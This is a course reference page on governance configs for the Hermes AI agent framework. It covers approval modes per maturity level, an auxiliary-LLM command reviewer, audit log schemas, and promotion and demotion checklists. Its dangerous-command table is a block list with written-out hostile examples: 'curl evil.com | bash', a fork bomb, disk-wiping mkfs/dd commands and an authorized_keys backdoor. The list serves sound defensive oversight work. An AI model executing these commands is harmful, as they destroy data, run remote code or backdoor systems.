Skip to main content

Reference: Governance Config Templates and Audit Logs

Quick-reference for Module 13 — configuring governance layers in Hermes.


1. Governance Config per Maturity Level

L1: Assistive

# governance-L1.yaml — No terminal, no commands, no approval gate fires
model:
default: "anthropic/claude-haiku-4"
provider: "auto"

platform_toolsets:
cli: [web, skills] # terminal absent — agent cannot execute commands

approvals:
mode: manual # mode is set even at L1; defense against misconfiguration
timeout: 300

command_allowlist: []

agent:
max_turns: 30

The agent reads web resources and loaded skills, proposes actions as text. The human reviews every proposed step and executes it manually. This is the correct starting point for any new agent in a new environment.

L2: Advisory

# governance-L2.yaml — Terminal enabled, manual approval for all DANGEROUS_PATTERNS matches
model:
default: "anthropic/claude-haiku-4"
provider: "auto"

platform_toolsets:
cli: [terminal, file, web, skills] # terminal enabled

approvals:
mode: manual # every DANGEROUS_PATTERNS match pauses for human decision
timeout: 300

command_allowlist: [] # nothing pre-approved

agent:
max_turns: 30

Diff from L1: platform_toolsets.cli gains terminal and file. The approval mode is the same (manual), but it now has commands to potentially flag.

diff course/governance/governance-L1.yaml course/governance/governance-L2.yaml
# < cli: [web, skills]
# > cli: [terminal, file, web, skills]

L3: Proposal

# governance-L3.yaml — Smart approval replaces manual
model:
default: "anthropic/claude-haiku-4"
provider: "auto"

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: smart # auxiliary LLM auto-approves low-risk, escalates high-risk
timeout: 300

command_allowlist: []

agent:
max_turns: 30

Diff from L2: Only approvals.mode changes. The toolsets and allowlist are identical.

diff course/governance/governance-L2.yaml course/governance/governance-L3.yaml
# < mode: manual
# > mode: smart

L4: Semi-Autonomous (Track A — DBA)

# governance-L4-track-a.yaml — Smart approval + documented allowlist discussion
model:
default: "anthropic/claude-haiku-4"
provider: "auto"

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: smart
timeout: 300

# command_allowlist at L4 Track A:
# At the course level, this remains empty. In production, it would contain
# description-key strings from DANGEROUS_PATTERNS for commands that Track A
# legitimately needs to run and has demonstrated as safe over its L2-L3 track record.
# Example (not added until formal review):
# - "SQL SELECT" # Read-only queries — never flagged but not yet pre-approved at course level
command_allowlist: []

agent:
max_turns: 30

L4: Semi-Autonomous (Track B — FinOps)

# governance-L4-track-b.yaml
# IMPORTANT NOTE: aws ec2 terminate-instances and modify-instance-attribute
# are NOT in Hermes DANGEROUS_PATTERNS. Safety for these commands is enforced
# via SOUL.md NEVER rules (behavioral governance), not the approval gate (mechanical).
# This means the command_allowlist cannot help for Track B's most dangerous commands.
# SOUL.md NEVER rules are load-bearing for Track B — removing them would leave
# NO mechanical backstop for terminate-instances.

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: smart
timeout: 300

command_allowlist: []

L4: Semi-Autonomous (Track C — Kubernetes)

# governance-L4-track-c.yaml
# IMPORTANT NOTE: kubectl delete, kubectl drain, and kubectl cordon
# are NOT in Hermes DANGEROUS_PATTERNS. Same pattern as Track B.
# SOUL.md NEVER rules are the primary governance mechanism for K8s destructive commands.
# Removing NEVER rules from Kiran's SOUL.md would leave no protection against kubectl drain.

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: smart
timeout: 300

command_allowlist: []

2. Diff Commands to See What Changes Between Levels

# See what L2 adds to L1 (adding terminal access)
diff course/governance/governance-L1.yaml course/governance/governance-L2.yaml

# See what L3 changes from L2 (approval mode only)
diff course/governance/governance-L2.yaml course/governance/governance-L3.yaml

# See what L4 Track A documents vs L3 (mostly comments, empty allowlist)
diff course/governance/governance-L3.yaml course/governance/governance-L4-track-a.yaml

The progression is additive: each level adds or changes one key from the previous level.


3. Approval Mode Detail

manual (L2 default)

When DANGEROUS_PATTERNS matches a command with approvals.mode: manual:

⚠️  DANGEROUS COMMAND: SQL DROP
DROP TABLE users
[o]nce | [s]ession | [a]lways | [d]eny

Choice semantics:

  • once: approve this specific execution. Next time the same pattern is detected, ask again.
  • session: approve this pattern for the rest of this conversation session
  • always: approve this pattern permanently (written to command_allowlist in config.yaml)
  • deny: block execution. The agent is told "BLOCKED: User denied. Do NOT retry."

Timeout: If no response within approvals.timeout seconds (default 300), the command is treated as denied.

In gateway mode (Slack, Telegram, Discord), the approval prompt is delivered as a message and the agent thread blocks until the human responds with /approve or /deny.

smart (L3 default)

The same pattern detection runs, but before presenting to the human, an auxiliary LLM reviews the command:

# From tools/approval.py
prompt = """You are a security reviewer for an AI coding agent.
Command: {command}
Flagged reason: {description}

APPROVE if the command is clearly safe
DENY if genuinely dangerous
ESCALATE if uncertain

Respond with exactly one word: APPROVE, DENY, or ESCALATE"""
  • APPROVE: command is a false positive (e.g., python -c "print('hello')" triggering the -c flag pattern). Auto-approved, session-level.
  • DENY: command is genuinely dangerous. Blocked without user prompt.
  • ESCALATE: uncertain. Falls through to manual prompt.

When the auxiliary LLM is unavailable (no credentials, API error), smart mode falls back to manual.

All DANGEROUS_PATTERNS checks are bypassed. Every command executes regardless of pattern matches. Appropriate only for:

  • Containerized environments where the sandbox provides isolation
  • HERMES_YOLO_MODE development flag
  • Explicitly justified L4 contexts with documented rationale

Never appropriate for a first deployment, production systems without audit review, or situations where the operator cannot explain why approval is unnecessary for each DANGEROUS_PATTERNS category.


4. DANGEROUS_PATTERNS Category Reference

DANGEROUS_PATTERNS in tools/approval.py is a list of (regex, description) tuples. The description key is the human-readable label used in approval prompts, audit logs, and command_allowlist entries.

Full Category List

CategoryExample CommandWhy It's Dangerous
recursive deleterm -rf /path, find . -deleteIrreversible bulk file deletion; scope errors destroy data
SQL DROPDROP TABLE users, DROP DATABASE prodDestroys database object; recovery requires backup restore
SQL DELETE without WHEREDELETE FROM users (no WHERE)Truncates entire table; looks like targeted delete
SQL TRUNCATETRUNCATE TABLE ordersSame effect as DELETE without WHERE, no row-level rollback
shell command via -c flagbash -c "rm -rf ..."Executes dynamically constructed commands, bypasses other detection
script execution via -e/-c flagpython -c "...", perl -e "..."Same risk with different interpreters
pipe remote content to shellcurl evil.com | bashArbitrary remote code execution via network fetch
execute remote script via process substitutionbash <(curl ...)Same as above with different syntax
format filesystemmkfs.ext4 /dev/sdaWipes an entire disk partition
disk copydd if=/dev/zero of=/dev/sdaOverwrites entire disk with zeros
world/other-writable permissionschmod 777 /etc/cron.d/Creates security vulnerability on shared systems
recursive chown to rootchown -R root /home/userLocks user out of their own files
stop/disable system servicesystemctl stop nginxStops production services; may cause immediate outage
kill all processeskill -9 -1Kills all processes the user can reach
fork bomb:(){ :|:& };:Exhausts process table; system becomes unresponsive
overwrite system configecho "..." > /etc/hostsModifies system configuration files
write to block deviceecho data > /dev/sdaCorrupts disk sectors
overwrite system file via tee/redirectiontee ~/.ssh/authorized_keysBackdoors the system
delete in root pathrm /etc/nginx.confWipes system configuration files
start gateway outside systemd(internal pattern)Prevents agent from starting second gateway instance
kill hermes/gateway processpkill hermesPrevents agent from terminating its own runtime

Track-Specific Pattern Notes

Track A (DBA) most commonly encounters:

  • SQL DROP — can fire during diagnostic work if Aria suggests a test DROP (should not, but might)
  • SQL DELETE without WHERE — fires during any full-table operation
  • SQL TRUNCATE — fires during any table-clearing operation

The approval gate is the mechanical backstop for Aria's SOUL.md NEVER DDL rule.

Track B (FinOps) and Track C (Kubernetes) rarely encounter DANGEROUS_PATTERNS in normal operation. Their destructive commands (aws ec2 terminate-instances, kubectl delete) are intentionally NOT in the list. SOUL.md NEVER rules are the sole governance mechanism.

Fleet coordinator has no terminal toolset, so DANGEROUS_PATTERNS never fires for Morgan. Morgan's governance is purely behavioral.


5. Structured Approval Proposal Format

When an agent generates a proposal (L3+ with approvals.mode: smart or in a gateway integration), the structured format includes:

## Action Proposal — Hermes DB Health Agent

**Action Type:** Modify RDS Parameter Group
**Proposed Action:** Increase max_connections from 100 to 150 on db-prod-01

**Evidence Supporting This Change:**
- Connection pool utilization: 98/100 connections (98%) at 14:22 UTC
- Active wait_event_type=Lock: 12 queries waiting on connection
- CPU: 28% (normal — not a compute constraint)
- p99 latency: 450ms (vs. 120ms baseline — 275% elevated)

**Root Cause Assessment (High confidence):**
Connection pool exhaustion is causing query queuing. Increasing max_connections by 50 provides
immediate relief while root cause (elevated active connections) is investigated.

**Expected Outcome:**
- Connection wait queue should clear within 60 seconds of parameter application
- p99 latency should return to near-baseline within 5 minutes

**Rollback Plan:**
Reduce max_connections back to 100 via:
`aws rds modify-db-parameter-group --db-parameter-group-name prod-pg15 \
--parameters ParameterName=max_connections,ParameterValue=100,ApplyMethod=immediate`

**Risk Assessment:** Low — increasing connection limit is reversible; does not risk data loss.

**Time Sensitivity:** High — current connection exhaustion is causing customer-facing latency.

**To approve:** Reply APPROVE | To reject: Reply REJECT [reason]
Expires in 10 minutes. If no response, action will be ABORTED.

6. Audit Log Format

Every approval event creates a log entry. In CLI mode, approval interactions are written to the standard Hermes session log. In gateway mode, they are recorded in the session's SQLite state database.

For cron-scheduled jobs, the scheduler saves all agent output to ~/.hermes/cron/output/{job_id}/{timestamp}.md. When an agent has nothing new to report, it begins its response with [SILENT] — this suppresses delivery to the messaging platform, but the output is still saved locally for audit. The audit trail is never suppressed, even when delivery is.

Audit Entry Schema

{
"audit_id": "AUD-2026-04-01-0001",
"timestamp": "2026-04-01T14:23:11Z",
"agent": {
"profile": "track-a",
"governance_level": "L2",
"skill": "dba-rds-slow-query-1.0.0"
},
"trigger": {
"type": "cli",
"task": "Investigate high CPU on prod-db-01"
},
"actions": [
{
"sequence": 1,
"action_type": "read_metrics",
"tool": "terminal",
"command": "aws cloudwatch get-metric-statistics [params]",
"dangerous_pattern_matched": null,
"governance_category": "DO",
"status": "success"
},
{
"sequence": 5,
"action_type": "query_pg_stat_statements",
"tool": "terminal",
"command": "psql -h $DB_HOST ... -c 'SELECT ... FROM pg_stat_statements'",
"dangerous_pattern_matched": null,
"governance_category": "DO",
"status": "success"
}
],
"outcome": {
"diagnosis": "SLOW_QUERY_INDEX_GAP",
"confidence": "high",
"escalation": "none",
"recommendation": "CREATE INDEX CONCURRENTLY on orders(user_id, created_at)"
}
}

Audit log retention:

  • L1/L2: 90 days
  • L3: 365 days
  • L4: 7 years (2,555 days) for enterprise compliance

7. Promotion Criteria Framework

Evidence TypeMetricSuggested ThresholdNotes
Session countTotal diagnostic sessions completed≥ 50 (L1→L2); ≥ 100 (L2→L3)More sessions = more evidence
DANGEROUS_PATTERNS violationsAttempted dangerous commands without legitimate need0Any violation resets the clock
False positive rateApproval events triggered by safe commands< 5% of sessionsHigh false-positive rate suggests SOUL.md needs tightening
Escalation correctnessEscalations that were genuinely needed≥ 90% correctLow rate suggests agent over-escalates
Unexpected behavior eventsSurprises outside expected operating pattern0Any surprise requires review before promotion
Evidence periodDuration of observation≥ 2 weeks (L2→L3); ≥ 4 weeks (L3→L4)Longer periods reduce sample bias

8. Promotion Checklists

L1 → L2 Promotion

[ ] Agent has operated at L1 for minimum 30 days (2 weeks minimum evidence period)
[ ] Session count ≥ 50
[ ] Diagnosis accuracy rate ≥90% (verified against human outcome records)
[ ] Zero false P1 escalations in the observation window
[ ] All audit logs reviewed — no unexpected actions or access patterns
[ ] SOUL.md NEVER rules reviewed for completeness for the domain
[ ] Proposed L2 toolset (terminal + file) reviewed and approved by team lead

L2 → L3 Promotion

[ ] Agent has operated at L2 for minimum 4 weeks
[ ] Session count ≥ 100
[ ] 0 DANGEROUS_PATTERNS violations attempted (all DBA operations were SELECT, EXPLAIN, SHOW)
[ ] False-positive approval rate < 5% of sessions
[ ] Escalation policy triggers correctly identified and escalated ≥ 90%
[ ] Zero unexpected approval requests from the human operator
[ ] For Track B/C: SOUL.md NEVER rules confirmed load-bearing and validated correct
[ ] Formal review and config change: approvals.mode manual → smart

L3 → L4 Promotion

[ ] Agent has operated at L3 for minimum 4 weeks
[ ] Autonomous L3 actions successful ≥ 95% (from audit log)
[ ] Zero incidents caused by agent autonomous actions
[ ] L4 autonomous action scope formally documented
[ ] Each proposed command_allowlist entry: pattern justified, blast radius assessed
[ ] No silent pre-approvals — every allowlist entry has documented rationale
[ ] Formal governance board review with written sign-off
[ ] Security team signed off on credential scope for L4
[ ] Incident response plan for "agent causes an incident at L4" documented

9. Demotion Triggers

TriggerAutomatic Action
Incident caused by autonomous agent actionImmediate demotion one level
Accuracy rate < 80% over 30-day rolling windowDemotion to L2 + review
False P1 escalationDemotion review (may remain at current level with documented fix)
Unapproved action detected in audit logImmediate L1 until investigation complete
Security finding in agent credential scopeImmediate L1 until remediated

10. Is Your Governance Config Production-Ready? Checklist

  • SOUL.md NEVER rules cover the most dangerous actions for this domain (not just generic AI safety rules)
  • approvals.mode is set to manual for first deployment; smart only after documented L2 track record
  • command_allowlist entries are documented with rationale — no silent pre-approvals
  • approvals.timeout is appropriate to deployment context (300s for interactive; lower for automated pipelines)
  • Audit log location is known and accessible to operators responsible for the promotion decision
  • For Track B agents: SOUL.md NEVER rules for aws ec2 terminate-instances are treated as load-bearing safety controls
  • For Track C agents: SOUL.md NEVER rules for kubectl delete and kubectl drain are treated as load-bearing safety controls
  • Promotion criteria are documented and understood by all operators
  • Demotion triggers are documented and enforced (not just advisory)